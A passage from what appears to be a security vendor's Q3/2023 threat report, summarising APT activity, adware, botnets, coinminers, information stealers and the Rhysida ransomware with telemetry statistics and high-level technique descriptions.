  5149. <p><em>An Advanced Persistent Threat (APT) is a type of cyberattack that is conducted by highly skilled and determined hackers who have the resources and expertise to penetrate a target&#8217;s network and maintain a long-term presence undetected.</em>&nbsp;</p>
  5150.  
  5151.  
  5152.  
5153. <p>APT groups are increasingly abusing imperfect validation processes to acquire driver signatures. Signed drivers, typically issued by reputable vendors, are presumed to be safe and authorized for use within an operating system. APTs, by subverting this trust, not only bypass detection mechanisms but also gain stealthy and privileged access to a targeted system, effectively rendering traditional security protocols obsolete. This daring approach challenges the very foundation of cybersecurity, highlighting the need for continuous innovation and vigilance in defending against evolving APT threats.</p>
  5154.  
  5155.  
  5156.  
5157. <p>In early June 2023, we discovered previously unknown drivers signed by Microsoft. These signed drivers had been distributed by the NSecRTS.exe signed binary, attributed to Shandong Anzai Information Technology Co., Ltd. It&#8217;s worth noting that NSecRTS is recognized as regular monitoring software and has been mentioned by the <a href="https://ti.qianxin.com/blog/articles/genuine-surveillance-software-used-by-hackers/" target="_blank" rel="noreferrer noopener">QiAnXin Virus Response Center</a>.</p>
  5158.  
  5159.  
  5160.  
5161. <p>Furthermore, we identified that NSecRTS.exe was dropping a driver signed by Microsoft. Upon conducting an extensive investigation, we uncovered multiple malicious activities associated with this driver. One of them was injecting a custom RAT into legitimate processes.</p>
  5162.  
  5163.  
  5164.  
  5165. <p>Our observations led us to identify victims in the Philippines and Thailand. Despite gathering extensive information, we were unable to definitively attribute the attacks to a specific entity.&nbsp;&nbsp;</p>
  5166.  
  5167.  
  5168.  
  5169. <p>Active geopolitical conflicts often attract the attention of APTs due to the volatile and chaotic nature of such environments. These groups, which are often state-sponsored and highly organized, see conflicts as opportunities to exploit the instability for their own strategic gains.&nbsp; The fog of war provides a convenient cover for their activities, allowing them to leverage the chaos to further their agendas, be it political, economic, or military. Notably, APTs have continued to leverage the ongoing war in Ukraine, and additional conflicts, such as the one in Nagorno-Karabakh, have emerged on their radar.&nbsp;</p>
  5170.  
  5171.  
  5172.  
5173. <p>One of the go-to infection vectors for APT groups this quarter was CVE-2023-38831, a vulnerability in WinRAR that allows an attacker to run arbitrary code on the victim&#8217;s machine. In many cases victims receive a malicious archive as an attachment to a phishing email. When opening the archive with a vulnerable version of WinRAR, the victim unwittingly executes malicious code, which might lead to an infection of the machine. We saw it being abused by multiple threat actors, including in attacks targeting Ukrainian government institutions and military, and governments in countries like Malaysia, Vietnam, the Philippines and more.</p>
  5174.  
  5175.  
  5176.  
  5177. <p>Infamous entities such as Lazarus, MustangPanda, and APT41 remain relentless in their global campaigns, consistently refining their tactics and expanding their malware arsenal. These groups continually explore novel techniques, introducing fresh tools and incorporating languages like Nim and Rust into their toolkits.</p>
  5178.  
  5179.  
  5180.  
  5181. <p class="has-text-align-right"><em>Luigino Camastra, Malware Researcher</em><br><em>Igor Morgenstern, Malware Researcher</em></p>
  5182.  
  5183.  
  5184.  
  5185. <h3 class="wp-block-heading">Adware</h3>
  5186.  
  5187.  
  5188.  
  5189. <p><em>Adware is considered unwanted if installed without the user&#8217;s consent, tracks browsing behavior, redirects web traffic, or collects personal information for malicious purposes such as identity theft.</em>&nbsp;</p>
  5190.  
  5191.  
  5192.  
  5193. <p>Adware is becoming popular due to the possibilities of monetization and of spreading potentially unwanted programs (PUP) and malware. Although malware spreading via adware is not the primary method to infect victims’ machines, we have focused on adware detections in Q3/2023 to monitor this potential threat.&nbsp;</p>
  5194.  
  5195.  
  5196.  
5197. <p>The results of the more precise adware detections can be seen in the chart below. This quarter shows an increase in adware activity that is caused by the SocialBar adware.&nbsp;</p>
  5198.  
  5199.  
  5200. <div class="wp-block-image">
  5201. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="351" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q3_malware_adware.png" alt="" class="wp-image-7807" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q3_malware_adware.png 890w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q3_malware_adware-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q3_malware_adware-768x303.png 768w" sizes="(max-width: 890px) 100vw, 890px" /><figcaption class="wp-element-caption"><em>Global Avast risk ratio from adware for Q2/2023 and Q3/2023</em></figcaption></figure></div>
  5202.  
  5203.  
5204. <p>The new detections help us to build a more precise global overview. Our telemetry reports four most active regions in terms of adware threats; namely, South America, Africa, Southeast Europe, and East Asia. See the map below.&nbsp;</p>
  5205.  
  5206.  
  5207. <div class="wp-block-image">
  5208. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="555" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-map_2023_Q2_Q3_malware_adware.gif" alt="" class="wp-image-7808"/><figcaption class="wp-element-caption"><em>Map showing the global risk ratio for Adware in Q3/2023 and Q2/2023</em></figcaption></figure></div>
  5209.  
  5210.  
  5211. <h4 class="wp-block-heading">Adware Share&nbsp;</h4>
  5212.  
  5213.  
  5214.  
5215. <p>The new detections reduced the ratio of unknown strains from 33% to 6%. SocialBar is the adware market leader in Q3/2023 with 58%. Its most used ad servers are registered under whimsical, randomly combined DNS names.&nbsp;</p>
  5246.  
  5247.  
  5248.  
  5249. <p>The rest of the shares are allocated to other adware strains as follows:&nbsp;</p>
  5250.  
  5251.  
  5252.  
  5253. <ul>
  5254. <li>MudOrange (7%)&nbsp;</li>
  5255.  
  5256.  
  5257.  
  5258. <li>DealPly (3%)&nbsp;</li>
  5259.  
  5260.  
  5261.  
  5262. <li>RelevantKnowledge (2%)&nbsp;</li>
  5263.  
  5264.  
  5265.  
  5266. <li>Neoreklami (2%)&nbsp;</li>
  5267.  
  5268.  
  5269.  
  5270. <li>MicroTag (2%)&nbsp;</li>
  5271. </ul>
  5272.  
  5273.  
  5274.  
  5275. <p class="has-text-align-right"><em>Martin Chlumecký,&nbsp;Malware Researcher</em></p>
  5276.  
  5277.  
  5278.  
  5279. <h3 class="wp-block-heading">Bots&nbsp;</h3>
  5280.  
  5281.  
  5282.  
  5283. <p><em>Bots are threats mainly interested in securing long-term access to devices with the aim of utilizing their resources, be it remote control, spam distribution, or denial-of-service (DoS) attacks.</em>&nbsp;</p>
  5284.  
  5285.  
  5286.  
5287. <p>Probably the most impactful change in the botnet landscape occurred at the end of August &#8211; the FBI-led attempt to take down and dismantle the Qakbot botnet. Interestingly, the target was not just its Command and Control (C&amp;C) infrastructure; the operation also attempted to disconnect infected clients from the botnet, effectively making it harder to resurrect the botnet under a new infrastructure. There is already an apparent drop in the number of clients being recruited into the botnet, which fell to one fifth of the “usual” value during August. While this is good news from the botnet perspective, it has not eliminated Qakbot-associated spam delivery capabilities. The threat actor associated with Qakbot distribution (TA577) began to distribute DarkGate as one of their phishing payloads soon after Qakbot’s takedown.&nbsp;</p>
  5288.  
  5289.  
  5290. <div class="wp-block-image">
  5291. <figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-1024x404.png" alt="" class="wp-image-7809" style="width:766px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/qakbot-stats-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Number of users protected from Qakbot throughout Q3/2023</em></figcaption></figure></div>
  5292.  
  5293.  
5294. <p>We are keeping our eye on the threat group NoName057(16) and their DDosia project. Its number of members had exceeded 13,000 users by the end of September. Based on the numbers from the previous quarter, they managed to gain some momentum with a steady increase of approximately 1,000 members every month. Their <em>modus operandi</em> remains the same – DDoS attacks, accusations of Russophobia and boasting about their accomplishments. It is quite unfortunate that the use of misleading terminology by mainstream media, such as mislabeling DDoS attacks as hacks or labeling their perpetrators as hackers, sometimes unwittingly inflates the public perception of such attacks, providing a much desired media coverage boost to the perpetrators. This is especially true for Internet activist groups, where media coverage also boosts the group&#8217;s credit in the community, further fueling their potential recruitment pool.</p>
  5295.  
  5296.  
  5297. <div class="wp-block-image">
  5298. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="444" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-ddosia-members.png" alt="" class="wp-image-7810" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-ddosia-members.png 890w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-ddosia-members-300x150.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-ddosia-members-768x383.png 768w" sizes="(max-width: 890px) 100vw, 890px" /><figcaption class="wp-element-caption">Number of DDosia members in 2023</figcaption></figure></div>
  5299.  
  5300.  
5301. <p>As for targets, most of the targeted top-level domains (TLDs) were .<em>pl</em> (Poland, 15%), .<em>lt </em>(Lithuania, 11%), and .<em>it </em>(Italy, 9%). The first two are no surprise, as both countries are actively involved in the Ukraine-Russia conflict. In the case of Italy, the group seemed to react to Joe Biden’s meeting with Italian PM Giorgia Meloni.&nbsp;</p>
  5302.  
  5303.  
  5304. <div class="wp-block-image">
5305. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="576" height="385" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ddosia-screenshot.png" alt="" class="wp-image-7811" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ddosia-screenshot.png 576w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ddosia-screenshot-300x201.png 300w" sizes="(max-width: 576px) 100vw, 576px" /><figcaption class="wp-element-caption"><em>NoName057(16)’s comment on Joe Biden’s meeting with Italian PM Giorgia Meloni</em></figcaption></figure></div>
  5306.  
  5307.  
5308. <p>Financial institutions were the most common target this quarter, presumably due to the potential financial damage and the chance of getting significantly better press coverage. As a side note, the group also seems to experiment with photo and graphic styles: they replaced their photo of a bear with a cartoonish image of a bear stylized as a hoodie-clad hacker (31<sup>st</sup> July) or as a member of an army (from the end of September on).&nbsp;</p>
  5309.  
  5310.  
  5311.  
5312. <p>Despite Qakbot’s takedown, the global risk ratio has slightly increased – partly because the takedown happened in the middle of the quarter and partly due to the increased activity of other botnets. We have seen a significant increase in the activity of the Tofsee (+41%), Emotet (+25%), and Trickbot (+13%) botnets. For most of the other families, our telemetry indicates a decline.&nbsp;</p>
  5313.  
  5314.  
  5315. <div class="wp-block-image">
  5316. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-1024x404.png" alt="" class="wp-image-7812" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio in Avast’s user base regarding bots in Q3/2023</em></figcaption></figure></div>
  5317.  
  5318.  
  5319. <p class="has-text-align-right"><em>Adolf Středa, Malware Researcher</em></p>
  5320.  
  5321.  
  5322.  
  5323. <h3 class="wp-block-heading">Coinminers</h3>
  5324.  
  5325.  
  5326.  
  5327. <p><em>Coinminers are programs that use a device&#8217;s hardware resources to verify cryptocurrency transactions and earn cryptocurrency as compensation. However, in the world of malware, coinminers silently hijack a victim&#8217;s computer resources to generate cryptocurrency for an attacker. Regardless of whether a coinminer is legitimate or malware, it&#8217;s important to follow our </em><a href="https://support.avast.com/en-eu/article/Threat-Lab-cryptomining-behavior-guideline/" target="_blank" rel="noreferrer noopener"><em>guidelines</em></a><em>.</em>&nbsp;</p>
  5328.  
  5329.  
  5330.  
  5331. <p>When compared to last quarter, in Q3/2023 we observed another 4% decrease in the risk ratio in the coinmining space. This is a continuing downward trend for coinmining threats.</p>
  5332.  
  5333.  
  5334. <div class="wp-block-image">
  5335. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1024x404.png" alt="" class="wp-image-7814" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio in Avast’s user base regarding coinminers in Q3/2023</em></figcaption></figure></div>
  5336.  
  5337.  
5338. <p>During Q3/2023, users in Serbia again faced the highest risk of encountering a coinminer, a regional trend we have seen over the past few quarters. However, with a risk ratio of 4.28%, this is a 26% drop in risk and a record low. A similar situation is seen in other higher-risk countries, including Madagascar with a 3.73% risk ratio, Montenegro with a 3.29% risk ratio, and Bosnia and Herzegovina with a 2.64% risk ratio.</p>
  5339.  
  5340.  
  5341. <div class="wp-block-image">
5342. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1024x639.png" alt="" class="wp-image-7815" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio for coinminers in Q3/2023</em></figcaption></figure></div>
  5343.  
  5344.  
5345. <p>Unfortunately, the market share of XMRig increased by 30%, and it now accounts for 23.65% of the total coinmining market share. CoinBitMiner also became more popular, increasing its malware market share by 10% and now accounting for 2.02% of the share. Web miners saw a slight decrease of 5%, now accounting for a combined 61.46% market share. Other strains, such as FakeKMSminer, VMiner, and CoinHelper, experienced a rather big decrease in activity, with 27%, 62%, and 29% decreases respectively.&nbsp;</p>
  5346.  
  5347.  
  5348.  
5349. <p>The most common coinminers with their market share in Q3/2023 were:&nbsp;</p>
  5350.  
  5351.  
  5352.  
  5353. <ul>
  5354. <li>Web miners (61.46%)&nbsp;</li>
  5355.  
  5356.  
  5357.  
  5358. <li>XMRig (23.65%)&nbsp;</li>
  5359.  
  5360.  
  5361.  
  5362. <li>CoinBitMiner (2.02%)&nbsp;</li>
  5363.  
  5364.  
  5365.  
  5366. <li>FakeKMSminer (1.58%)&nbsp;</li>
  5367.  
  5368.  
  5369.  
  5370. <li>NeoScrypt (1.03%)&nbsp;</li>
  5371.  
  5372.  
  5373.  
  5374. <li>CoinHelper (0.77%)&nbsp;</li>
  5375.  
  5376.  
  5377.  
  5378. <li>VMiner (0.73%)</li>
  5379. </ul>
  5380.  
  5381.  
  5382.  
  5383. <p class="has-text-align-right"><em>Jan Rubín, Malware Researcher</em></p>
  5384.  
  5385.  
  5386.  
  5387. <h3 class="wp-block-heading">Information Stealers</h3>
  5388.  
  5389.  
  5390.  
  5391. <p><em>Information stealers are dedicated to stealing anything of value from the victim’s device. Typically, they focus on stored credentials, cryptocurrencies, browser sessions/cookies, browser passwords and private documents.</em>&nbsp;</p>
  5392.  
  5393.  
  5394.  
  5395. <p>The common belief that &#8220;I have nothing to hide, I don&#8217;t need to protect my data&#8221; is fundamentally flawed. Even individuals who believe their data lacks value may find out that, at scale, everything may become valuable. This kind of data can be monetized via sales on underground forums, used for further attacks including more targeted scams and phishing (so called <em>spear-phishing</em>), leveraged for blackmailing, and more. Stay safe out there.&nbsp;</p>
  5396.  
  5397.  
  5398.  
  5399. <p>In Q3/2023, we observed an overall 6% decrease in information stealers activity in comparison to the previous quarter, slowing down the decreasing trend we have been recently observing.&nbsp;</p>
  5400.  
  5401.  
  5402.  
5403. <p>The biggest change this quarter is that, according to our data, Raccoon Stealer experienced a huge decrease in activity, with a 72% drop in market share. On the other hand, some other strains increased their presence significantly, namely AgentTesla, Fareit, and SnakeKeylogger, balancing the scales.</p>
  5404.  
  5405.  
  5406. <div class="wp-block-image">
5407. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1024x404.png" alt="" class="wp-image-7816" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio in Avast’s user base regarding information stealers in Q3/2023</em></figcaption></figure></div>
  5408.  
  5409.  
5410. <p>Geographical distribution stayed consistent between Q2 and Q3/2023. Among the countries where we have a more significant userbase, the highest risk ratios are in Pakistan (2.47%), Turkey (2.05%), and Egypt (1.90%). Thankfully, the risk ratio in these countries decreased compared to the previous quarter by 5%, 7%, and 14%, respectively.&nbsp;</p>
  5411.  
  5412.  
  5413.  
5414. <p>The biggest increases in risk ratio with regards to information stealers were seen in Ukraine (44%), the United States (21%), and India (16%).</p>
  5415.  
  5416.  
  5417. <div class="wp-block-image">
  5418. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1024x639.png" alt="" class="wp-image-7817" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure></div>
  5419.  
  5420.  
5421. <p>AgentTesla still holds, and further cemented, first place among the most popular information stealers, increasing its market share by another 9%. FormBook, the second-place holder, stayed consistent, increasing its market share by only 0.55%. Fareit, SnakeKeylogger, and Stealc all experienced an increase in their market share, by 11%, 68%, and 4%, respectively.&nbsp;</p>
  5422.  
  5423.  
  5424.  
  5425. <p>Fortunately, Raccoon Stealer with its 72% drop in market share was not alone. RedLine and Arkei were both 10% less active in Q3/2023 with regards to market share, along with ViperSoftX dropping by another 7%.&nbsp;</p>
  5426.  
  5427.  
  5428.  
  5429. <p>The most common information stealers with their market share in Q3/2023 were:&nbsp;</p>
  5430.  
  5431.  
  5432.  
  5433. <ul>
  5434. <li>AgentTesla (29.14%)&nbsp;</li>
  5435.  
  5436.  
  5437.  
  5438. <li>FormBook (11.39%)&nbsp;</li>
  5439.  
  5440.  
  5441.  
  5442. <li>RedLine (5.46%)&nbsp;</li>
  5443.  
  5444.  
  5445.  
  5446. <li>Fareit (5.45%)&nbsp;</li>
  5447.  
  5448.  
  5449.  
  5450. <li>Lokibot (4.51%)&nbsp;</li>
  5451.  
  5452.  
  5453.  
  5454. <li>Arkei (3.96%)&nbsp;</li>
  5455.  
  5456.  
  5457.  
  5458. <li>ViperSoftX (2.08%)&nbsp;</li>
  5459.  
  5460.  
  5461.  
  5462. <li>Raccoon Stealer (1.95%)&nbsp;</li>
  5463. </ul>
  5464.  
  5465.  
  5466.  
  5467. <p>It is also worth mentioning new information stealers or their variants, which have displayed a notable surge in activity over the past couple of months. These malicious actors are constantly evolving their tactics to bypass security measures and exfiltrate sensitive data. These often include new techniques that exploit vulnerabilities in both software and human behavior, making it imperative for organizations and individuals to remain vigilant and adopt robust cybersecurity strategies to safeguard their valuable information.&nbsp;</p>
  5468.  
  5469.  
  5470.  
  5471. <p>The new version of Rilide Stealer, targeting banking data, was seen to <a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/new-rilide-stealer-version-targets-banking-data-and-works-around-google-chrome-manifest-v3/" target="_blank" rel="noreferrer noopener">work around Google Chrome Manifest V3</a>. One of the new features of the Manifest V3 is disabling remote code execution in browser extensions. As a workaround, Rilide Stealer is using inline events along with Declarative Net Requests rules to execute the code remotely and remove the Content Security Policy headers. Since Rilide is being distributed using local loaders on the infected machines, that is without the use of Chrome Web Store, there is no review process involved that would detect this practice.&nbsp;</p>
  5472.  
  5473.  
  5474.  
5475. <p>Furthermore, new connections between Rhadamanthys and the Hidden Bee coinminer <a href="https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/" target="_blank" rel="noreferrer noopener">were discovered</a>, providing new insights into their inner workings and implementation details. Another malware, called DarkGate, is a loader with further capabilities such as keylogging, cryptocurrency mining, stealing information from browsers, and overall remote access functionality. Even though the malware can be traced back a couple of years, it is still under active development, introducing <a href="https://www.malwarebytes.com/blog/news/2023/09/microsoft-teams-used-to-deliver-darkgate-loader-malware" target="_blank" rel="noreferrer noopener">new infection vectors</a> such as delivery via Microsoft Teams.&nbsp;</p>
  5476.  
  5477.  
  5478.  
  5479. <p>Additionally, Lumma, a malware-as-a-service stealer, is also continually gaining in popularity. The malware&#8217;s capabilities range from cryptocurrency theft to targeting two-factor authentication (2FA) browser extensions, harvesting banking data, credentials, and more.&nbsp;</p>
  5480.  
  5481.  
  5482.  
5483. <p>Clippers are generally small malicious programs that are used to swap the victim’s clipboard content for content specified by the attacker – in this case, crypto wallet addresses. Clippers that have gained popularity in the previous months include, among others, <a href="https://cyble.com/blog/multiple-new-clipper-malware-variants-discovered-in-the-wild/" target="_blank" rel="noreferrer noopener">Atlas Clipper, Keyzetsu Clipper, and KWN Clipper</a>, which usually leverage Telegram both for command and control communication and for offering the malware for sale.</p>
  5484.  
  5485.  
  5486.  
  5487. <p class="has-text-align-right"><em>Jan Rubín, Malware Researcher</em></p>
  5488.  
  5489.  
  5490.  
  5491. <h3 class="wp-block-heading">Ransomware</h3>
  5492.  
  5493.  
  5494.  
  5495. <p><em>Ransomware is any type of extorting malware. The most common subtype is the one that encrypts documents, photos, videos, databases, and other files on the victim’s PC. Those files become unusable without decrypting them first. To decrypt the files, attackers demand money, “ransom”, hence the term ransomware.</em>&nbsp;</p>
  5496.  
  5497.  
  5498.  
  5499. <p>The prevalence of ransomware is certainly not diminishing. In fact, it is the opposite. According to the research of <a href="https://www.chainalysis.com/blog/crypto-crime-midyear-2023-update-ransomware-scams/" target="_blank" rel="noreferrer noopener">Chainalysis</a>, the total sum of money extorted during the first half of 2023 is about $450 million (compared to $280 million in the first half of 2022). This is caused by a change of tactics of the ransomware operators – they tend to target bigger victims, which brings the possibility of bigger figures paid as ransom. The average payment size for the top strains is as high as $1.7 Million USD (Cl0p ransomware) and $1.5 Million (BlackCat ransomware).&nbsp;</p>
  5500.  
  5501.  
  5502.  
5503. <p>Vulnerabilities in popular third-party applications widely used in companies make the attackers’ job easier. We wrote about the SQL injection vulnerability in the Progress MOVEit Transfer software in the <a href="https://decoded.avast.io/threatresearch/avast-q2-2023-threat-report/" target="_blank" rel="noreferrer noopener">previous Threat Report</a>.&nbsp;&nbsp;</p>
  5504.  
  5505.  
  5506.  
  5507. <p>In addition to encryption of the victim data, ransomware gangs increasingly perform data extortion. Data encryption may be solved if the company has a good data backup policy; data extortion and subsequent leakage of internal documents may be a problem regardless of it. Also, keep in mind that when the ransom is paid, they <a href="https://www.bleepingcomputer.com/news/security/scam-psa-ransomware-gangs-dont-always-delete-stolen-data-when-paid/" target="_blank" rel="noreferrer noopener">don’t always keep the promise of deleting the extorted data</a>.&nbsp;</p>
  5508.  
  5509.  
  5510.  
  5511. <p>One of the new ransomware strains that emerged this quarter was Rhysida. <a href="https://twitter.com/malwrhunterteam/status/1658829565215604738" target="_blank" rel="noreferrer noopener">The first mention of the ransomware</a> was in May 2023 and the ransomware leak site already lists about fifty successfully attacked organizations &#8211; government, healthcare, IT, municipalities.</p>
  5512.  
  5513.  
  5514. <div class="wp-block-image">
  5515. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="676" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-1024x676.png" alt="" class="wp-image-7818" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-1024x676.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-300x198.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-768x507.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-1536x1013.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site.png 1543w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Rhysida leak site on the dark web</figcaption></figure></div>
  5516.  
  5517.  
5518. <p>The encryptor used by the Rhysida gang is a 32-bit or 64-bit EXE file, compiled with MinGW/GCC 6.3.0 and linked with GNU Linker 2.30. For cryptographic operations, <a href="https://github.com/libtom/libtomcrypt/releases/tag/v1.18.1" target="_blank" rel="noreferrer noopener">LibTomCrypt v 1.18.1</a> is used as the crypto library. Files are encrypted with the AES cipher in counter mode, and the per-file key and IV are encrypted with RSA-4096 using OAEP padding.&nbsp;</p>
  5519.  
  5520.  
  5521.  
  5522. <p>Rhysida wants to be as fast as possible during file encryption:&nbsp;</p>
  5523.  
  5524.  
  5525.  
  5526. <ul>
5527. <li><strong>Intermittent data encryption</strong>. Not everything is encrypted. For larger files, Rhysida only encrypts a few distinct file blocks.&nbsp;</li>
5528.  
5529.  
5530.  
5531. <li><strong>Multi-threaded encryption</strong>. Rhysida creates one encryptor thread per processor, so all processors in the PC are busy during the encryption process.&nbsp;</li>
  5532. </ul>
  5533.  
  5534.  
  5535.  
5536. <p>From the use of the <em>pthreads</em> library, we assume that the authors of the Rhysida ransomware wanted to build an encryptor that is also easily portable to other platforms.&nbsp;</p>
  5537.  
  5538.  
  5539.  
  5540. <p>Rhysida drops a ransom note file called “CriticalBreachDetected.pdf” into each folder. The following picture shows an example of the ransom note:</p>
  5541.  
  5542.  
  5543. <div class="wp-block-image">
  5544. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="816" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note-1024x816.png" alt="" class="wp-image-7819" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note-1024x816.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note-300x239.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note-768x612.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note.png 1239w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Content of the ransom note created by Rhysida</figcaption></figure></div>
  5545.  
  5546.  
